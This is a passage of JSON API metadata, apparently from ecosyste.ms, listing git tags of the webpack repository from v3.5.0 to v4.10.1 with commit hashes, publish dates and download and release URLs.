.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name"